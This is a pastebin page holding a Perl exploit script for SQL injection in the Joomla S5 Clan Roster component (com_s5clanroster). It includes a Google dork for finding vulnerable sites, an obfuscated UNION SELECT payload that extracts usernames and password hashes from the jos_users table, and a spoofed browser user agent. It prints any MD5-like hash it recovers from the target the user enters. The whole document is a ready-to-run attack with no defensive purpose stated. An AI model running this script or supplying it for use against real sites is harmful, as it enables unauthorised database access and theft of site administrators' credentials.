SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/usr/bin/perl | |
| 2 | #Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit | |
| 3 | #Google Dork: inurl:index.php?option=com_s5clanroster& | |
| 4 | #Vendor HomePage: http://www.joomla.org/ | |
| 5 | system("clear");
| |
| 6 | system("cls");
| |
| 7 | print "=========================================================\n"; | |
| 8 | print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection *\n"; | |
| 9 | print "* Coded by TheLooper *\n"; | |
| 10 | print "* Greetz: To All My Friends <3 *\n"; | |
| 11 | print "=========================================================\n"; | |
| 12 | sleep 1; | |
| 13 | use LWP::UserAgent; | |
| 14 | print "Enter the target site: "; | |
| 15 | chomp(my $target=<STDIN>); | |
| 16 | $code="%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-"; | |
| 17 | $agent = LWP::UserAgent->new() or die "[!] Error while processing"; | |
| 18 | $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
| |
| 19 | $host= $target. "/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null".$code; | |
| 20 | $ok = $agent->request(HTTP::Request->new(GET=>$host)); | |
| 21 | $ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
| |
| 22 | print "[+] Password found --> $1\n$2\n"; | |
| 23 | sleep 1; | |
| 24 | } | |
| 25 | else | |
| 26 | {
| |
| 27 | print "Password not found \n"; | |
| 28 | } |
